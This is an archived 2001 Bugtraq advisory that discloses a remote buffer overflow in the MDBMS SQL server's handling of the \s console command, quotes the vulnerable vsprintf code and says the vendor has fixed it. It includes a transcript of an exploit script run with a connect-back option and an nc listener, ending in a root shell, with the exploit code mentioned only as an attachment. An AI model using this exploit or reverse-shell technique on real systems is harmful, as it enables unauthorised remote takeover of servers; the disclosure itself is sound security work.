Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Remote buffer overflow in MDBMS.

From: teleh0r - <teleh0r () digit-labs org>
Date: Tue, 12 Jun 2001 21:47:37 +0200

Dear bugtraq readers,
 
MDBMS is a SQL database server (currently) for UNIX systems.
Version 0.99b9 and below versions contain an exploitable
buffer overflow in the handling of the \s console command.
 
When a user passes large buffers to the server in the form
of multiple lines, these are appended to the end of each
other. A subsequent call to the \s command causes the
overflow.
 
Below is faulty code (from interface.cc):
 
void user::uprintf(char *s, ...)
{
  char b[10000];
  int len=strlen(outbuf), newlen;
  va_list ap;
  va_start(ap,s);
  vsprintf(b,s,ap); <----
  va_end(ap);
  newlen=strlen(b);
  while (newlen+len+10>=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000);
  strcat(outbuf,b);
  FD_SET(fd,&parent->wmask);
}
 
mu-b also found a buffer overflow in the "create database"
system. This was actually caused by a sprintf that generated
the name of the management variable. This has been fixed -
now table and database names can no longer be larger than
128 bytes.
 
Information about the overflows was sent to marty () hinttech com.
He has now fixed the problems, and new versions of MDBMS can
be found at: http://www.hinttech.com/mdbms/
 
We would like to thank Marty for kind response and quick update.
 
Exploit example:
----------------
 
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl
 
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r () digit-labs org> - Copyright (c) 2001
 
Usage: ./mdbms-pms.pl -t <hostname> -b <back>
 
     -t <hostname>    : hostname to test
     -b <back>        : connect back to ip
     -p <port>        : port (default: 2223)
     -d <delay>       : delay before timeout
     -o <offset>      : offset
     -h               : return to heap
 
[teleh0r@localhost mdbms]$ nc -l -v -p 1337 &
[1] 2070
listening on [any] 1337 ...
 
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h
 
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r () digit-labs org> - Copyright (c) 2001
 
-> Connected to: 127.1 / MDBMS V0.99b9 ready.
-> Address : 0x302027d / xor-mask: 0x2020202
-> Return  : 0x80cfe76 / using the heap ...
-> Sending payload: ...
 
-> * Successfully sent payload - good luck!
 
connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
[teleh0r@localhost mdbms]$ %
nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...
 
Exploit code attached.
 
Sincerely yours,
teleh0r and mu-b

--
To avoid criticism, do nothing, say nothing, be nothing.
                 -- Elbert Hubbard

Attachment: mdbms.tar.gz
Description:

Previous By Date Next
Previous By Thread Next

Current thread: